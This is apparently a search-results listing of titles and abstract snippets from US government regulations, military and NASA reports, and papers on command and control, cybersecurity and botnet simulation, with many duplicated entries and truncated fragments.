..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS FIRE PROTECTION EQUIPMENT Manual Sprinkling System, Details § 76.23-20 Piping. (a) All piping, valves, and fittings shall meet the applicable... the Commandant. (c) All piping, valves, fittings, and sprinkler heads shall be securely supported, and...
Code of Federal Regulations, 2012 CFR
2012-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS FIRE PROTECTION EQUIPMENT Manual Sprinkling System, Details § 76.23-20 Piping. (a) All piping, valves, and fittings shall meet the applicable... the Commandant. (c) All piping, valves, fittings, and sprinkler heads shall be securely supported, and...
Code of Federal Regulations, 2011 CFR
2011-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS FIRE PROTECTION EQUIPMENT Manual Sprinkling System, Details § 76.23-20 Piping. (a) All piping, valves, and fittings shall meet the applicable... the Commandant. (c) All piping, valves, fittings, and sprinkler heads shall be securely supported, and...
Code of Federal Regulations, 2014 CFR
2014-10-01
..., DEPARTMENT OF HOMELAND SECURITY (CONTINUED) PASSENGER VESSELS FIRE PROTECTION EQUIPMENT Manual Sprinkling System, Details § 76.23-20 Piping. (a) All piping, valves, and fittings shall meet the applicable... the Commandant. (c) All piping, valves, fittings, and sprinkler heads shall be securely supported, and...
Understanding Commanders’ Information Needs for Influence Operations
2009-01-01
AND HEALTH CARE INTERNATIONAL AFFAIRS NATIONAL SECURITY POPULATION AND AGING PUBLIC SAFETY SCIENCE AND TECHNOLOGY SUBSTANCE ABUSE TERRORISM AND...Scott, Cathryn Quantic Thurston, Kristin J. Leuschner Prepared for the United States Army Approved for public release; distribution unlimited ARROYO...Information services. 3. Command of troops. 4. Influence (Psychology) 5. Information warfare—United States. 6. Combined operations (Military science
Targets for Marine Corps Purchasing and Supply Management Initiatives: Spend Analysis Findings
2011-01-01
TRANSPORTATION INTERNATIONAL AFFAIRS LAW AND BUSINESS NATIONAL SECURITY POPULATION AND AGING PUBLIC SAFETY SCIENCE AND TECHNOLOGY TERRORISM AND...States Transportation Command UNICOR Federal Prison Industries, Inc. USMC United States Marine Corps WHS/SIAD Washington Headquarters Services...Services Admin- istration (GSA), and the United States Transportation Command (TRANSCOM), as well as via Military Interdepartmental Purchase Requests
Communications Processors: Categories, Applications, and Trends
1976-03-01
allow switching from BSC to SDLC .(12) Standard protocols would ease the requirement that communications processor software convert from one...COMMANDER c^/g^_ (^-»M-^ V »*-^ FRANK J. EMMA, Colonel, USAF Director, information Systems Technology Applications Office Deputy for Command...guidelines in selecting a device for a specific application are included, with manufacturer models presented as illustrations. UNCLASSIFIED SECURITY
Automatic Response to Intrusion
2002-10-01
Computing Corporation Sidewinder Firewall [18] SRI EMERALD Basic Security Module (BSM) and EMERALD File Transfer Protocol (FTP) Monitors...the same event TCP Wrappers [24] Internet Security Systems RealSecure [31] SRI EMERALD IDIP monitor NAI Labs Generic Software Wrappers Prototype...included EMERALD , NetRadar, NAI Labs UNIX wrappers, ARGuE, MPOG, NetRadar, CyberCop Server, Gauntlet, RealSecure, and the Cyber Command System
United States Pacific Command, Asia-Pacific Economic Update.
1998-04-01
economic development and regional security in the Asia Pacific region. What started as a collapse of investor confidence in Thailand...growth in history. This economic growth has been fostered by market-oriented economic policies on the part of individual countries and a secure regional...U.S. investment in regional security supports the maintenance of a regional focus on productive activity and economic
33 CFR 26.08 - Exemption procedures.
Code of Federal Regulations, 2011 CFR
2011-07-01
... 33 Navigation and Navigable Waters 1 2011-07-01 2011-07-01 false Exemption procedures. 26.08 Section 26.08 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY GENERAL VESSEL... redelegated to the Assistant Commandant for Marine Safety, Security and Environmental Protection, U.S. Coast...
33 CFR 26.08 - Exemption procedures.
Code of Federal Regulations, 2010 CFR
2010-07-01
... 33 Navigation and Navigable Waters 1 2010-07-01 2010-07-01 false Exemption procedures. 26.08 Section 26.08 Navigation and Navigable Waters COAST GUARD, DEPARTMENT OF HOMELAND SECURITY GENERAL VESSEL... redelegated to the Assistant Commandant for Marine Safety, Security and Environmental Protection, U.S. Coast...
32 CFR 182.5 - Responsibilities.
Code of Federal Regulations, 2014 CFR
2014-07-01
... account in the planning and execution of military training and operations. (k) The Commanders of U.S... Defense and Americas' Security Affairs (ASD(HD&ASA)), under the authority, direction, and control of the... Defense and Americas' Security Affairs (ASD(HD&ASA)),” shall develop, coordinate, recommend, and supervise...
32 CFR 182.5 - Responsibilities.
Code of Federal Regulations, 2013 CFR
2013-07-01
... account in the planning and execution of military training and operations. (k) The Commanders of U.S... Defense and Americas' Security Affairs (ASD(HD&ASA)), under the authority, direction, and control of the... Defense and Americas' Security Affairs (ASD(HD&ASA)),” shall develop, coordinate, recommend, and supervise...
NASA Astrophysics Data System (ADS)
Bovino, Fabio Antonio; Messina, Angelo
2016-10-01
In a very simplistic way, the Command and Control functions can be summarized as the need to provide the decision makers with an exhaustive, real-time, situation picture and the capability to convey their decisions down to the operational forces. This two-ways data and information flow is vital to the execution of current operations and goes far beyond the border of military operations stretching to Police and disaster recovery as well. The availability of off-the shelf technology has enabled hostile elements to endanger the security of the communication networks by violating the traditional security protocols and devices and hacking sensitive databases. In this paper an innovative approach based to implementing Device Independent Quantum Key Distribution system is presented. The use of this technology would prevent security breaches due to a stolen crypto device placed in an end-to-end communication chain. The system, operating with attenuated laser, is practical and provides the increasing of the distance between the legitimate users.
Trusted Data Communication and Security Issues in Gnss Network of Turkey
NASA Astrophysics Data System (ADS)
Bakici, S.; Erkek, B.; Manti, V.; Altekin, A.
2017-11-01
There are three main activities of General Directorate of Land Registry and Cadastre. These are Mapping, Land Registry and Cadastre. Geomatic Department is responsible for mapping activities. The most important projects like TUSAGA-Aktif (CORS-Tr), Metadata Geoportal, Orthophoto Production and orthophoto web services and preparation of Turkish NSDI Feasibility Report have been conducted and completed by this department's specialists since 2005. TUSAGA-Aktif (CORS-Tr) System, serves location information at cm level accuracy in Turkey and TR Nortern Cyprus in few seconds, where adequate numbers of GNSS satellites are observed and communication possibilities are present. No ground control points and benchmarks are necessary. There are 146 permanent GNSS stations within the CORS-Tr System. Station data are transferred online to the main control center located in the Mapping Department of the General Directorate of Land Registry and Cadastre and to the control center located in the General Command of Mapping. Currently CORS-Tr has more than 9000 users. Most of them are private companies working for governmental organization. Providing data communication between control center and both GNSS station and users via trusted and good substructure is important. Additionally, protection of the system and data against cyber attacks from domestic and foreign sources is important. This paper focuses on data communication and security issues of GNSS network named TUSAGA-Aktif.
2011-06-01
discuss best practices and the prerogatives of major events C2 solutions. In section 6, we present the conclusion. 2 Complexity of the Command and Control...best practices for sharing information, standard operating procedure (SOPs) and response plans have been investigated through formal studies and an...and contributed to the deployment of an information sharing solution on Command Network. This solution was based on Microsoft SharePoint. The team
2008-01-01
the ideas of John Maynard Keynes and explained that increased government spending could stimulate dynamic ecnomic growth. Eisenhower appears to have...that he had given every effort to "securing fervent European adherence to the essentials of the NATO concept," but that "throughoul West Europe, there...Eisenhower, who saw the EDC’s military provisions as essential to future political cooperation among the West Europeans. Eisenhower thought the real
32 CFR 105.9 - Commander and management procedures.
Code of Federal Regulations, 2013 CFR
2013-07-01
... expedited transfer, the Service member must affirmatively change his or her reporting option to Unrestricted... replacement order. (ii) The issuing commander shall notify the appropriate civilian authorities of any change... command climate of sexual assault prevention predicated on mutual respect and trust, recognizes and...
32 CFR 105.9 - Commander and management procedures.
Code of Federal Regulations, 2014 CFR
2014-07-01
... expedited transfer, the Service member must affirmatively change his or her reporting option to Unrestricted... replacement order. (ii) The issuing commander shall notify the appropriate civilian authorities of any change... command climate of sexual assault prevention predicated on mutual respect and trust, recognizes and...
Vehicle Theft Identification and Intimation Using GSM & IOT
NASA Astrophysics Data System (ADS)
Eswar Kumar, M.; Thippa Reddy, G.; Sudheer, K.; Reddy, M. Praveen Kumar; Kaluri, Rajesh; Singh Rajput, Dharmendra; Lakshmanna, Kuruva
2017-11-01
Internet of Things is the most predominant innovation associates the things through web. IoT is a technology which interfaces things from different places on the planet. Home mechanization is a wide range innovation in IoT technology on the planet. Home automation constitutes in security issues, controlling gadgets and so on. In existing model, the vehicle theft is distinguished and controlled by physically with GSM module. Furthermore, there are a few in controlling the vehicle is major issue for owner from theft. Here in this paper a technique described to overcome issue of existing one. In this the vehicle is identified, controlled and connected updates with Internet in a simple way. By utilization of AT commands of GSM module a message will be send to the owner that the vehicle is recognized. Action can be taken by sending a reply to GSM module to stop motor of vehicle. Arduino uno board is used to interface the GSM and engine of vehicle with appropriate sensors. Visual studio, Arduino uno are the programming software used to outline this application.
2008 Homeland Security S and T Stakeholders Conference West
2008-01-16
Untitled Document 2008hls.html[5/26/ 2016 8:25:16 AM] 2008 Homeland Security S&T Stakeholders Conference West “Putting First Responders First” Los...Sector Commander/Captain of the Port, U.S. Coast Guard Sector Los Angeles - Long Beach Mr. Mark Denari, Director, Aviation Security & Public Safety...Document 2008hls.html[5/26/ 2016 8:25:16 AM] Pre Conference Training Workshop Monday, 14 January 2008 Training Session 3:Better Security via Randomization
1989-06-01
Science Unclassified SECURITY CLASSIFICATION OF THIS PAGE REPORT DOCUMENTATION PAGE la. REPORT SECURITY CLASS’r!CATION )b RESTRICTIVE MARKINGS UNCLASSIFIED...2a. SECURITY CLASSIFICATION AUTHORITY 3. DISTRIBUTION/AVAILABILITY OF REPORT Approved for public release; Zb. DECLASSIFICATION I DOWNGRADING SCHEDULE...ZIP Code) 10 SOURCE OF FUNDING NUMBERS PROGRAM PROJECT TASK WORK UNIT Monterey, CA. 93943 FLEMENT NO. NO. NO ACCESSION NO. 11. TITLE (Include Security
Climate Change, Instability and a Full Spectrum Approach to Conflict Prevention in Africa
2009-10-23
commander to follow. 15. SUBJECT TERMS Climate Change, Global Warming , Security Cooperation, Stability, Instability, Stabilization, Security...note that global warming could also create similar impacts on resources.19 In modern times disputes over natural resources have erupted into conflict...16. Center for Naval Analysis, National Security and the Threat of Climate Change, 18. 17. Michael T. Klare, ― Global Warming Battlefields: How
Development of Amphibious Doctrine
2010-06-11
Graduate Degree Programs Robert F. Baumann, Ph.D. The opinions and conclusions expressed herein are those of the student author and do not...battalion composed of six companies of Marines, its commander, Lieutenant Colonel Robert W. Huntington, finally received the mission of securing an...42,000 men. The participants included the Commanding Officer, Marine Corps Schools, Colonel Robert Dunlap, as well as the students and instructors
Blair, James D
2005-01-01
Healthcare and other private sector industries have lagged behind federal agencies in fulfilling their security readiness mission, according to the author. A comprehensive and timely resource is now available, he reports, to help healthcare officials in improving emergency response and preparedness.
75 FR 31807 - Federal Property Suitable as Facilities To Assist the Homeless; Republication
Federal Register 2010, 2011, 2012, 2013, 2014
2010-06-04
.... Albert Johnson, Department of the Navy, Asset Management Division, Naval Facilities Engineering Command..., and 75A Reasons: Secured Area Bldgs. 3550, 3551 Naval Base San Diego CA Landholding Agency: Navy... Reasons: Secured Area Maine Bldgs. B496 and 497 Bangor Internatl Airport Bangor ME 04401 Landholding...
2008-12-01
the Black Sea’s natural beauty and resources; and improving security throughout the region. At its foundation, it follows from the same goals we have...developing countries, the force’s commander told online journalists and bloggers in an August 8, 2008 teleconference. Many past humanitarian
Tactical Level Command and Control and Decision Making Utilizing FBCB2-BFT
2010-09-01
area. Due to the inherent uncertainty of battle (fog of war) and the limited range of radio communications, mission type orders were issued that...existence 8 of a tactical level was simply a reflection of the practical issues that face commanders, and the control measures that they adopt to...overcome them. These “ issues ” included the “geography they operate in, the scale of forces involved, and the technology that defines the
The Unified Command Plan and Combatant Commands: Background and Issues for Congress
2012-07-17
U.S. Army Special Operations Command (USASOC) USASOC includes Army Special Forces, also known as Green Berets; Rangers ; Civil Affairs, and Military...weather, day/night C-5 Galaxy -capable air base. JTF-Bravo organizes multilateral exercises and, with partner nations, supports humanitarian and civic
India’s Emerging Security Strategy, Missile Defense, and Arms Control
2004-06-01
and contemplate a security strategy. Starting in July 1998, a series of negotiations between Foreign Minister Jaswant Singh and US envoy Strobe...arms control.46 The Singh -Talbott discussions eventually led to the reaffirmation of civilian command-and-control and a doctrine of “minimum...Council (NSC), including Prime Minister Vajpayee, Minister of Foreign Affairs Singh , and Minister of Defense Fernandes, and appointed a National Security
2011-06-01
Selected Security Features in BlackBerry and SME PED Devices...Figure 1, the blue bars represent the net present value (NPV) of costs for current DoD wireless services on the unclassified (e.g., BlackBerry ) and...PDA], Blackberry , iPhone, etc.) for both Battle Command applications and communications and secure data only that needs to be classified as part of
The U.S. Footprint on the Arabian Peninsula: Can We Avoid a Repeat of the Pullout from Saudi Arabia?
2009-12-01
respective GCC country. Centrally located power is defined as the government of a GCC country that allows minimal or no political liberalization ...exercise more political liberalization , and carefully balance religious entities with secular foreign policy requirements are far less easily manipulated...Command and Defense Security Cooperation Agency staff, and conference material related to EU -GCC security. Other national security strategy
IT Security Support for the Spaceport Command Control System Development
NASA Technical Reports Server (NTRS)
Varise, Brian
2014-01-01
My job title is IT Security support for the Spaceport Command & Control System Development. As a cyber-security analyst it is my job to ensure NASA's information stays safe from cyber threats, such as, viruses, malware and denial-of-service attacks by establishing and enforcing system access controls. Security is very important in the world of technology and it is used everywhere from personal computers to giant networks ran by Government agencies worldwide. Without constant monitoring analysis, businesses, public organizations and government agencies are vulnerable to potential harmful infiltration of their computer information system. It is my responsibility to ensure authorized access by examining improper access, reporting violations, revoke access, monitor information request by new programming and recommend improvements. My department oversees the Launch Control System and networks. An audit will be conducted for the LCS based on compliance with the Federal Information Security Management Act (FISMA) and The National Institute of Standards and Technology (NIST). I recently finished analyzing the SANS top 20 critical controls to give cost effective recommendations on various software and hardware products for compliance. Upon my completion of this internship, I will have successfully completed my duties as well as gain knowledge that will be helpful to my career in the future as a Cyber Security Analyst.
Cyber Warfare: China’s Strategy to Dominate in Cyber Space
2011-06-10
CYBER WARFARE : CHINA‘S STRATEGY TO DOMINATE IN CYBER SPACE A thesis presented to the Faculty of the U.S. Army Command and...warfare supports the use of cyber warfare in future conflict. The IW militia unit organization provides each Chinese military region commander with...China, Strategy, Cyber Warfare , Cyber Space, Information Warfare, Electronic Warfare 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF ABSTRACT 18
Securing the Northern Maritime Border Through Maritime Domain Awareness
2010-09-01
is handled through 1) aircraft overflights (Coast Guard and Coast Guard Auxiliary aircraft, U.S. Air Force, Customs and Border Patrol, Canadian...caliber machine gun, or like automatic weapons. Bruce Levy, Director, U.S. Transboundary Division conveyed to Nancy Mason, Director, Office of...1 NORAD, the North American Aerospace Defense Command, is a binational military command focused on the air defense of North America and located
Humanitarian Assistance: An Opportunity Is Lost
2009-10-23
national strategic objectives.‖15 General James Jones , then Commander, United States European Command, viewed theater security cooperation programs...Peace, 1. 15Fred Baker, ―Humanitarian Efforts Aid Diplomacy,‖ American Forces Free Press, 23 November 2008. 16 James L. Jones , ―Testimony...Craig Llewellyn . ―Humanitarian Medical Assistance in U.S. Foreign Policy: Is There a Constructive Role for Military Medical Services.‖ The DISAM
DOE Office of Scientific and Technical Information (OSTI.GOV)
Pasquale, David A.; Hansen, Richard G.
This paper discusses command and control issues relating to the operation of Incident Command Posts (ICPs) and Emergency Operations Centers (EOCs) in the surrounding area jurisdictions following the detonation of an Improvised Nuclear Device (IND). Although many aspects of command and control will be similar to what is considered to be normal operations using the Incident Command System (ICS) and the National Incident Management System (NIMS), the IND response will require many new procedures and associations in order to design and implement a successful response. The scope of this white paper is to address the following questions: • Would themore » current command and control framework change in the face of an IND incident? • What would the management of operations look like as the event unfolded? • How do neighboring and/or affected jurisdictions coordinate with the state? • If the target area’s command and control infrastructure is destroyed or disabled, how could neighboring jurisdictions assist with command and control of the targeted jurisdiction? • How would public health and medical services fit into the command and control structure? • How can pre-planning and common policies improve coordination and response effectiveness? • Where can public health officials get federal guidance on radiation, contamination and other health and safety issues for IND response planning and operations?« less
Small satellite debris catalog maintenance issues
NASA Technical Reports Server (NTRS)
Jackson, Phoebe A.
1991-01-01
The United States Space Command (USSPACECOM) is a unified command of the Department of Defense, and one of its tasks is to detect, track, identify, and maintain a catalog of all man-made objects in Earth orbit. This task is called space surveillance, and the most important tool for space surveillance is the satellite catalog. The command's reasons for performing satellite catalog maintenance is presented. A satellite catalog is described, and small satellite-debris catalog-maintenance issues are identified. The underlying rationale is to describe the catalog maintenance services so that the members of the community can use them with assurance.
[Network Design of the Spaceport Command and Control System
NASA Technical Reports Server (NTRS)
Teijeiro, Antonio
2017-01-01
I helped the Launch Control System (LCS) hardware team sustain the network design of the Spaceport Command and Control System. I wrote the procedure that will be used to satisfy an official hardware test for the hardware carrying data from the Launch Vehicle. I installed hardware and updated design documents in support of the ongoing development of the Spaceport Command and Control System and applied firewall experience I gained during my spring 2017 semester to inspect and create firewall security policies as requested. Finally, I completed several online courses concerning networking fundamentals and Unix operating systems.
A Data Analysis of Naval Air Systems Command Funding Documents
2017-06-01
Directorate for Information Operations and Reports, 1215 Jefferson Davis Highway, Suite 1204, Arlington, VA 22202-4302, and to the Office of Management ...Business & Financial Managers 15. NUMBER OF PAGES 75 16. PRICE CODE 17. SECURITY CLASSIFICATION OF REPORT Unclassified 18. SECURITY...Summary Statistics for Regressions with a Statistically Significant Relationship
2014-05-22
capacity of several Oil Coast nations through building accountable institutions, 56William Brownfield , Assistant Security of State for International...Maturation of a New U.S. Combatant Command. Carlisle, PA: Strategic Studies Institute, 2013. Brownfield , William. Assistant Security of State for
Aviation Security, Risk Assessment, and Risk Aversion for Public Decisionmaking
ERIC Educational Resources Information Center
Stewart, Mark G.; Mueller, John
2013-01-01
This paper estimates risk reductions for each layer of security designed to prevent commercial passenger airliners from being commandeered by terrorists, kept under control for some time, and then crashed into specific targets. Probabilistic methods are used to characterize the uncertainty of rates of deterrence, detection, and disruption, as well…
Command Inspections - A Self-Evaluation Approach
1988-03-30
Tool in the Air Force," Air Wa’ Collg •e Report go. AV-A C-85J174, Air University, United States Air Force, Maxwell AFB, Alabama, Kay 1985, r)p. 1-40...Safety and Fire Prevention 3. Physical Security and Crime Prevention 4. Information and Personnel Security 5, Operations 6. Training 7. Nuclear
The Future of Indigenous Security Force Training: Considerations for the Joint Operational Commander
2007-11-06
FINAL 3. DATES COVERED (From - To) 4. TITLE AND SUBTITLE The Future of Indigenous Security Force Training: 5a. CONTRACT NUMBER...focus on indigenous security force training and development (ISFTD) is unique to OIF or if it foreshadows a requirement that must be addressed in...operational plans using ad hoc capabilities. This research paper seeks to demonstrate that the U.S. military has an increased need to train indigenous
DoD Security Assistance Management Manual
1988-10-01
IDSS Administrator for U.S. Army Training Activities: TSASS Database Manager SATFA Attn: ATFA-I 2017 Cunningham Drive, 4th Floor Hampton VA 23666 DSN...Depot, Chambersburg, PA J. School of Engineering and Logistics, Red River Army Depot, Texarkana , "TX K. Lone Star Ammunition Plant, Texarkana , TX L...Electronics Command, Ft. Monmouth, NJ U. Red River Army Depot, Texarkana , TX V. Army Aviation Research and Development Command, St. Louis, MO W
Operational Commanders: It’s Time to Take Command...of the Media
2003-02-03
media companies should only send experienced military reporters to cover U.S. forces. This policy may even raise the journalistic standards of...2. Security Classification Authority: 3. Declassification/Downgrading Schedule: 4. Distribution/Availability of Report : DISTRIBUTION STATEMENT A...Ausiello, USN 10.Type of Report : FINAL 11. Date of Report : 03 February 2003 12.Page Count: 20 12A Paper Advisor (if any): 13.Supplementary Notation
Defending Air Bases in an Age of Insurgency
2014-05-01
2007, http://www.defence.gov.au/raaf/adg/; WGCDR John Leo , RAAF, commanding officer, 2AFDS, e-mail correspondence with the author, 1 March–9 April...2007; and WGCDR John Leo , RAAF, commanding offi- cer, 2AFDS, “Airfield Defence Squadron Operations & Support” [Power- Point presentation, 22 February...in- stallations throughout the country: The initial mission of these forces is to secure the base and its internal LOCs [lines of communication
Poston, Walker S.C.; Haddock, Christopher K.; Jahnke, Sara A.; Hyder, Melissa L.; Jitnarin, Nattinee
2014-01-01
Military installation newspapers are a primary means used by military commanders to communicate information about topics important to military personnel including leadership, training issues, installation events, safety concerns, and vital health issues. We conducted a content analysis of military commanders’ messages about health issues that were published in online military installation newspapers/newsfeeds. We identified a total of 75 publicly accessible installation newspapers/newsfeeds with commanders’ messages (n=39 Air Force, n=19 Army, n=7 Navy, n=1 Marine, and n=9 Joint Bases). Commander messages published between January 2012–December 2012 were collected, screened, and coded. Coder inter-rater reliability was 98.9%. Among the 2,479 coded commanders’ messages, 132 (5.3%) addressed a health topic as the primary focus. There were no significant differences between service branches in the percentage of health-oriented messages (χ2=5.019, p=0.285). The most commonly addressed health topics were exercise/fitness (23.5%), other mental health concerns (19.7%), alcohol/DUI (13.6%), and suicide (12.1%). Tobacco use was directly addressed as a primary health aim in only two commanders’ messages (1.5%). Health topics, and particularly tobacco-related content, are rarely written about by military commanders. The absence of tobacco-related health messages from line leadership contributes to the perception that tobacco control is a low priority. PMID:26032388
Good for the Goose, Good for the Gander; A Coast Guard Model for the Thousand-Ship Navy
2006-10-23
deterring those who threaten them. On receiving the Department of State’s 2002 George Schultz Service Award, then Coast Guard Commandant Admiral James...for Homeland Security, Washington, D.C.: Office of Homeland Security, 2002. Vego, Milan , “Major Operations in the Littorals: NWC 1008,” U.S. Naval
Defense.gov Special Report: Travels with Hagel - September 2013
Security, Defense Cooperation In a joint statement, U.S. and Japanese diplomatic and military leaders Shutdown Looms Seoul's Prosperity Shows Success of U.S.-South Korean Alliance Hagel Praises 60-year-old U.S Leaders in Tokyo Hagel, Dempsey Attend Security Meeting in South Korea Hagel, Dempsey Attend Command
360 PORT MDA - A Strategy to Improve Port Security
2006-09-01
Participating Agencies (After: Executive Briefing..........................27 Table 6. Designated Joint Operations Center Participants (From: SAFE...Investigations CGIP Coast Guard Intelligence Program CHOC Charleston Harbor Operations Center CIO Command Intelligence Officer CMT Combating Maritime... EXECUTIVE SUMMARY Ports are critical to our economy and national security. Key hubs in the international trade network, U.S. ports accounted for more than
Federal Register 2010, 2011, 2012, 2013, 2014
2011-05-17
..., but are not limited to, liquefied petroleum gas, ammonium nitrate and associated mixtures, anhydrous... Department of Homeland Security Management Directive 023-01 and Commandant Instruction M16475.lD, which guide... accordance with the general regulations in 33 CFR part 165, Subpart D, no person or vessel may enter or...
2000-05-01
Security Establishment from Canada and Ministry of Finance from Finland and Service Central de la Sécurité des Systèmes d’Information from France and...Nazionale per la Sicurezza CESIS III Reparto - UCSi from Italy and Ministry of the Interior and Kingdom Relations from The Netherlands and Page 3 of...39 HQ Defence Command Norway/Security Division from Norway and Ministerio de Administraciones Públicas from Spain and Communications-Electronics
Collins Center Update. Volume 14, Issue 2, January-March 2012
2012-03-01
forces in Afghanistan, the Romanian Armed Forces General Staff requested a traveling contact team (TCT) from the Commander, U.S. European Command...THIS ISSUE • Strategic Decision Making Exercise (SDME) 2012 • The Romanian Armed Forces and Joint Staff Planning • The Senior Leader Seminar (SLS...military decision-making exercise is designed as a capstone event which provides students the opportunity to role-play as strategic leaders and staffs
2012-12-06
command relationship issues between the SB, ESC and TSC, as well as the coordination to the Joint Force and Corps commanders. These are available on the... issues to remain hidden through the skillful use of the warfighter to improvise and make do. This study intends to provide insight into overlooked but...Pagonis with Jeffrey L. Cruikshank, Moving Mountains: Lessons in Leadership and Logistics from the Gulf War (Boston, MA: Harvard Business Review
Annual Report to the President and the Congress
2004-01-01
planning process has determined is needed to meet the military tasks as- signed to the Department by the President in his national security strategy...Commands" document, which formally as- signs forces to combatant commanders. The Global Force Management Process subsumes two developmen- tal measures...www.t2net.org), which was signed by Deputy Secretary of Defense Paul Wolfowitz on June 10, 2003, is a road map to developing and fielding dynamic
On Cyber Warfare Command and Control Systems
2004-06-01
longer adequate to rely solely on the now traditional defense-in-depth strategy. We must recognize that we are engaged in a form of warfare, cyber warfare , and... warfare . This causes security devices to be used ineffectively and responses to be untimely. Cyber warfare then becomes a one-sided battle where the... cyber warfare strategy and tactics requires a cyber warfare command and control system. Responses to cyber attacks do not require offensive measures
Organizing NORTHCOM for Success: A Theater Special Operations Command
2003-05-22
90 U.S. FORSCOM, "Olympic and Paralympic Games Operations Plan for Emergency Contingency Support," (Ft. McPherson: U.S...Army Forces Command. "Olympic and Paralympic Games Operations Plan for Emergency Contingency Support." Ft. McPherson: Georgia, 1996. ———. "HQ FORSCOM and...Atlanta Organizing Committee for the Olympic Games for the purpose of planning for security and logistical support that the Department of Defense may
Joint Force Quarterly. Number 31, Summer 2002
2002-09-01
College of the Armed Forces COL Timothy S. Heinemann, USA ■ U.S. Army Command and General Staff College CAPT Chester E. Helms, USN ■ Naval War College...Announcing the next event in the 2002– 2003 symposia program Pacific Symposium Towards a Durable Security Strategy (Co-sponsored with U.S. Pacific...Command) March 25–27, 2003 Information on symposia is available via the National Defense University World Wide Web server. Access by addressing
2007-03-01
term “The Short Century” was used for the first time by Eric Hobsbawn, in his book The Short Century, written 1994, in which he claims that the...military implementation of the Peace Agreement.”148 147 Richard L. Layton , Command and Control...Richard L. Layton , Command and Control Structure, in Lessons from Bosnia: The IFOR Experience, Larry Wentz ed., (Washington D.C.: Institute for National
Commander Lousma adds water to a beverage container on middeck
NASA Technical Reports Server (NTRS)
1982-01-01
Commander Lousma, wearing communications kit assembly (assy) mini headset (HDST), fills beverage container using the JSC water dispenser kit water gun to prepare a juice drink. Lousma is wearing the trousers and shirt of a three-piece shuttle constant wear garment as he floats above the potable water tank on the middeck floor. The constant wear garment jacket is secured on a side hatch handle (background) to avoid zero gravity effect.
32 CFR 700.106 - Control of administrative requirements.
Code of Federal Regulations, 2010 CFR
2010-07-01
... requirements will not be imposed unless the expected value of the information to be gained is significantly... within the chain of command or the issuing authority, the first common superior of the commands affected...
Operationalizing Space Weather Products - Process and Issues
NASA Astrophysics Data System (ADS)
Scro, K. D.; Quigley, S.
2006-12-01
Developing and transitioning operational products for any customer base is a complicated process. This is the case for operational space weather products and services for the USAF. This presentation will provide information on the current state of affairs regarding the process required to take an idea from the research field to the real-time application of 24-hour space weather operations support. General principles and specific issues are discussed and will include: customer requirements, organizations in-play, funding, product types, acquisition of engineering and validation data, security classification, version control, and various important changes that occur during the process. The author's viewpoint is as an individual developing space environmental system-impact products for the US Air Force: 1) as a member of its primary research organization (Air Force Research Laboratory), 2) working with its primary space environment technology transition organization (Technology Application Division of the Space and Missile Systems Center, SMC/WXT), and 3) delivering to the primary sponsor/customer of such system-impact products (Air Force Space Command). The experience and focus is obviously on specific military operationalization process and issues, but most of the paradigm may apply to other (commercial) enterprises as well.
System-wide power management control via clock distribution network
Coteus, Paul W.; Gara, Alan; Gooding, Thomas M.; Haring, Rudolf A.; Kopcsay, Gerard V.; Liebsch, Thomas A.; Reed, Don D.
2015-05-19
An apparatus, method and computer program product for automatically controlling power dissipation of a parallel computing system that includes a plurality of processors. A computing device issues a command to the parallel computing system. A clock pulse-width modulator encodes the command in a system clock signal to be distributed to the plurality of processors. The plurality of processors in the parallel computing system receive the system clock signal including the encoded command, and adjusts power dissipation according to the encoded command.
Advancing botnet modeling techniques for military and security simulations
NASA Astrophysics Data System (ADS)
Banks, Sheila B.; Stytz, Martin R.
2011-06-01
Simulation environments serve many purposes, but they are only as good as their content. One of the most challenging and pressing areas that call for improved content is the simulation of bot armies (botnets) and their effects upon networks and computer systems. Botnets are a new type of malware, a type that is more powerful and potentially dangerous than any other type of malware. A botnet's power derives from several capabilities including the following: 1) the botnet's capability to be controlled and directed throughout all phases of its activity, 2) a command and control structure that grows increasingly sophisticated, and 3) the ability of a bot's software to be updated at any time by the owner of the bot (a person commonly called a bot master or bot herder.) Not only is a bot army powerful and agile in its technical capabilities, a bot army can be extremely large, can be comprised of tens of thousands, if not millions, of compromised computers or it can be as small as a few thousand targeted systems. In all botnets, their members can surreptitiously communicate with each other and their command and control centers. In sum, these capabilities allow a bot army to execute attacks that are technically sophisticated, difficult to trace, tactically agile, massive, and coordinated. To improve our understanding of their operation and potential, we believe that it is necessary to develop computer security simulations that accurately portray bot army activities, with the goal of including bot army simulations within military simulation environments. In this paper, we investigate issues that arise when simulating bot armies and propose a combination of the biologically inspired MSEIR infection spread model coupled with the jump-diffusion infection spread model to portray botnet propagation.
33 CFR 13.01-15 - Applications and recommendations.
Code of Federal Regulations, 2012 CFR
2012-07-01
... SECURITY GENERAL DECORATIONS, MEDALS, RIBBONS AND SIMILAR DEVICES Gold and Silver Lifesaving Medals, Bars...) The decision of the Commandant on all applications, recommendations, and investigations for the Gold...
NASA Technical Reports Server (NTRS)
Goseva-Popstojanova, Katerina; Tyo, Jacob P.; Sizemore, Brian
2017-01-01
NASA develops, runs, and maintains software systems for which security is of vital importance. Therefore, it is becoming an imperative to develop secure systems and extend the current software assurance capabilities to cover information assurance and cybersecurity concerns of NASA missions. The results presented in this report are based on the information provided in the issue tracking systems of one ground mission and one flight mission. The extracted data were used to create three datasets: Ground mission IVV issues, Flight mission IVV issues, and Flight mission Developers issues. In each dataset, we identified the software bugs that are security related and classified them in specific security classes. This information was then used to create the security vulnerability profiles (i.e., to determine how, why, where, and when the security vulnerabilities were introduced) and explore the existence of common trends. The main findings of our work include:- Code related security issues dominated both the Ground and Flight mission IVV security issues, with 95 and 92, respectively. Therefore, enforcing secure coding practices and verification and validation focused on coding errors would be cost effective ways to improve mission's security. (Flight mission Developers issues dataset did not contain data in the Issue Category.)- In both the Ground and Flight mission IVV issues datasets, the majority of security issues (i.e., 91 and 85, respectively) were introduced in the Implementation phase. In most cases, the phase in which the issues were found was the same as the phase in which they were introduced. The most security related issues of the Flight mission Developers issues dataset were found during Code Implementation, Build Integration, and Build Verification; the data on the phase in which these issues were introduced were not available for this dataset.- The location of security related issues, as the location of software issues in general, followed the Pareto principle. Specifically, for all three datasets, from 86 to 88 the security related issues were located in two to four subsystems.- The severity levels of most security issues were 